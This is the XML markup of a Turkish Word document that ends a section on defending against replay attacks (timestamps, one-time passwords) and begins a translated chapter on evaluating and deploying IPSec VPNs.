        <w:t>Bu tür bir saldırı için bir başka önleyici önlem, tüm mesajlarda zaman damgası kullanmaktır. Bu, bilgisayar korsanlarının belirli bir süreden daha uzun bir süre önce gönderilen mesajları yeniden göndermelerini önler, böylece bir saldırganın gizlice dinlenmesi, iletinin sifonu çekilmesi ve yeniden gönderilmesi için fırsat penceresini azaltır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FC39D1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Mağdur olmaktan kaçınmanın başka bir yolu da, yalnızca bir kez kullanılan ve atılan her işlem için bir parolaya sahip olmaktır. Bu, mesaj bir saldırgan tarafından kaydedilmiş ve tekrar gönderilmiş olsa bile, şifreleme kodunun süresinin dolmuş ve artık çalışmamasını sağla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722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Son Söz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00722B6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p w:rsidR="00E77DF4" w:rsidRPr="00722B60" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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22B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tekrar saldırıları başarılı olurlarsa ağ güvenliği için gerçek bir tehdit teşkil eder. Diğer birçok saldırı tipinin aksine, tekrar saldırıları verinin şifresinin çözülmesini gerektirmez bu da onları sürekli daha da fazla güvenli şifreleme protokolüyle karşı karşıya kalan kötü niyetli kişiler için etkin bir  çözüm haline getirir.</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77DF4" w:rsidRPr="00DE5EB1"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DE5EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Kaynakça</w:t>
      </w:r>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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE5EB1"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DE5EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:r w:rsidRPr="00DE5EB1">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.binance.vision/tr/security/what-is-a-replay-attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE5EB1"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DE5EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidRPr="00DE5EB1">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.bgasecurity.com/makaleler/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4"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pr"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidRPr="00DE5EB1">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://dergipark.org.tr/download/article-file/465726</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00302256"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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00302256">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidRPr="00302256">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.binance.vision/security/what-is-a-replay-attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00302256"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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00302256">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r w:rsidRPr="00302256">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r w:rsidRPr="00302256">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.careerride.com/Networking-replay-attacks.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00302256"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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00302256">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r w:rsidRPr="00302256">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://medium.com/coinmonks/what-is-a-replay-attack-b0e2c3b1dec4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE5EB1"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77DF4" w:rsidRPr="00722B60" w:rsidRDefault="00E77DF4" w:rsidP="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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8220"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35B56EAB" wp14:editId="0C63756F">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4101" name="Resim 4101"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Section 2.2.14-2.2.15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Şeyda AS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50757022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C26E50" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008562A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008562A5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">VPN Dağıtım ve </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008562A5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Değerlendirme Stratejisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008562A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>_____________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008562A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008562A5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Keith Pasley, CISSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VPN teknolojisi son yıllarda performans, kullanım kolaylığı, dağıtım ve yönetim aracı etkinliği alanlarında hızla gelişmiştir. Sanal özel ağ (VPN) teknolojisi için pazar talebi de hızla artmaktadır. Benzer şekilde, farklı VPN ürünlerinin sayısı artıyor. Maliyet tasarrufu vaadi yerine getiriliyor. Ancak, VPN’lere hem teknik hem de ticari açıdan yaklaşan yeni bir söz var. Günümüzün hızlı tempolu iş ortamında, VPN sistemlerinin yönetim kolaylığı, konuşlandırıla bilirlik ve ölçeklenebilirlik vaadi, doğru VPN sisteminin seçilmesi ve uygulanmasında kritik başarı faktörleridir. İş açısından bakıldığında, elde edilen faydalar şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Muhataplar ve müşterilerle daha yakın ilişkiler kurarak rekabet avantajı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yeni hizmet sunumu kanalları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008562A5">
        <w:t>Daha az maliyetle yeni pazarlara ulaşmak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bu çabayı engelleyen güvenlik kaygılarının giderilmesiyle daha değerli bilgiler sunmak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu kadar çok seçenekle, kişi en uygun olanı nasıl belirler?  Satıcı ürünü taleplerinin adil bir şekilde değerlendirilebilmesi için nesnel kriterlere ihtiyaç vardır.  Satıcı ürünü taleplerinin adil bir şekilde değerlendirilmesini yapmak için nesnel ölçütler gerekli mi?  VPN sistemlerine başka ne değer katabilir? </w:t>
      </w:r>
      <w:r w:rsidRPr="008562A5">
        <w:t>Bazı durumlarda, yönetilen bir güvenlik servis sağlayıcısına dış kaynak kullanımı bir seçenektir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Yönetilen güvenlik servis sağlayıcıları, genellikle güvenlik uygulamalarını barındıran ve barındırılan güvenlik uygulamasının işlem tabanlı kullanımını sunan servis dış kaynak sağlayıcılarıdır. </w:t>
      </w:r>
      <w:r w:rsidRPr="008562A5">
        <w:t>Artık birçok işletme, VPN'leri dağıtım ve yönetim sağlayabilen yönetilen güvenlik hizmeti sağlayıcılarına dış kaynak sağlamayı düşünüyor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Algı, yönetilen servis sağlayıcıların, büyük ölçekli VPN'leri şirket içi personelden daha iyi işletecek uzmanlık ve yönetim altyapısına sahip olmasıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VPN performansı, VPN ürünlerinin daha yeni sürümlerinde sürekli olarak iyileşmiştir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA701E">
        <w:t xml:space="preserve"> Performans önemli olmasına rağmen, bir VPN çözümü seçiminde en önemli kriter bu mu?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hayır. Hızlı ama sömürülebilir bir VPN uygulama güvenliği geliştirmeyecektir. Performansı değerlendirmek de zordur ve birçok performans Testler gerçek dünyadaki durumları taklit eden kötü bir iş yapıyor. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA701E">
        <w:t>Satıcı performans talepleri, gerçek dünyadaki uygulamalarda göze çarpmayan aşırı iyimser pazarlama odaklı performans iddiaları nedeniyle çok yakından değerlendirilmelidir. Bu gibi performans taleplerinin temeli olarak satıcılar tarafından kullanılan test metodolojilerini anlamak önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bu bölüm, bilgi güvenliği uzmanlarının ne zaman karşılaştığı sorunlara cevaplar sunar.ürünleri seçmek ve VPN uygulamak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA701E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VPN Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VPN'ler, özel bilgilerin İnternet gibi genel bir ağ üzerinden aktarılmasına izin verir.  Bir VPN, ağ çevresinin bir uzantısıdır ve bu nedenle, ağ güvenliği politikasını tüm VPN giriş noktalarında eşit olarak uygulayabilmelidir. Kapsülleme ve şifreleme kullanımı sayesinde, verilerin gizliliği kamuya açık bir ağı geçerken korunur. Bu teknolojinin uygun şekilde kullanılmasının teknik yararları arasında işletme maliyetlerinin azaltılması, ağ erişim güvenliğinin arttırılması, transit veri bütünlüğü, kullanıcı ve veri kimlik doğrulaması ve veri gizliliği sayılabilir. Bununla birlikte, finansal yararların bazıları, VPN çözümünün satın alınmasından sonra, dağıtım sırasında, devam eden yönetim ve destek sırasında gerçekleşen VPN sisteminin gerçek maliyetleri ile ihmal edilebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="0061003E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bu tür ürün farklılaşması Çoğu üreticinin VPN ürünleri aynı VPN protokolünü kullandığı için önemi giderek artmaktadır - IPSec - ve diğer temel teknolojiler.</w:t>
      </w:r>
      <w:r w:rsidRPr="0061003E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPSec, İnternet’e güvenlik genişletmeleri tanımlayan uluslararası bir standarttır. İnternet protokolü. VPN'leri uygulamak için kullanılan başka güvenli tünel protokolleri olsa da, IPSec tercih edilen protokol olarak liderliğini üstlendi. </w:t>
      </w:r>
      <w:r w:rsidRPr="0061003E">
        <w:t>Bu standart, minimum düzeyde satıcı birlikte çalışabilirliği sağlayan zorunlu özellikleri belirtir. Bu bölüm, bilgi güvenliği uzmanlarının IPSec VPN çözümlerini değerlendirirken kullanılabilecek bir dizi kriter belirlemelerine yardımcı olacaktır. Tartışma, VPN uygulamalarının incelenmesiyle başlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IPSec VPN Uygulamaları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:t>İşletmeler, dört uygulama gereksinimini karşılamak için genellikle sanal özel ağları (VPN'ler) aradılar: uzaktan erişim, siteden siteye intranet, güvenli extranet ve güvenli iç ağ. Teknik amaç, çoğu durumda yetkili kullanıcılara korumalı ağ veri kaynaklarına (yani sunucu dosyaları, disk paylaşımları, vb.) Kontrollü erişim sağlamaktır. Ortak bir iş hedefi, ağ altyapısı maliyetlerini yönetmek ve iç ve dış iş bilgi akışının verimliliğini artırmak, kullanıcı verimliliğini, rekabet avantajını veya iş ortağı ilişkilerinin gücünü artırmaktır.  Bir VPN değerlendirme projesinde yer alan görevleri tanımlamak iyi bir fikirdir. Bir görev listesi, değerlendirmeyi odaklı tutmaya yardımcı olacak ve değerlendirmeyi tamamlamak için gereken kaynakları öngörmeye yardımcı olacaktır. Sergi 40.1’de VPN değerlendirme projesi görevlerinin örnek listesi</w:t>
      </w:r>
      <w:r w:rsidRPr="0061003E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0061003E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Uzaktan Erişim VPN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uzaktan erişim VPN'in iki bölümü vardır: sunucu ve istemci. İki farklı rolleri var ve bu nedenle iki farklı değerlendirme kriteri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>İş hedefi: daha düşük telekom maliyetleri, artan çalışan verimliliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Teknik hedef: Uzaktaki çalışanlara güvenli LAN erişimi ile aynı erişimi sağlamak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:t>Bu bölümde hem roller hem de kriterler tartışılmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uzaktan erişim IPSec VPN'leri, kullanıcıların ne zaman, nerede ve ne zaman isterlerse şirket kaynaklarına erişmelerini sağlar. Uzaktan erişim VPN'leri, mobil kullanıcıları ve telekomünikasyonları güvenli bir şekilde bağlamak için IPSec gibi güvenlik protokolleriyle birlikte analog, kadran, ISDN, dijital abone hattı (DSL), mobil IP ve kablolu İnternet erişim teknolojilerini içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EK 40.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VPN değerlendirme projesi görevleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Veri güvenliği gereksinimlerini değerlendirin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:lastRenderedPageBreak/>
        <w:t>Kullanıcıları sınıflandırın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:t>Kullanıcı konumlarını değerlendirin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ağ bağlantısı ve erişim gereksinimlerini belirleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:t>Ürün veya servis sağlayıcı seçin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Donanım / yazılım ihtiyaçlarını değerlendirin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir test laboratuvarı kurun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Değerlendirme cihazları edinin.</w:t>
      </w:r>
    </w:p>
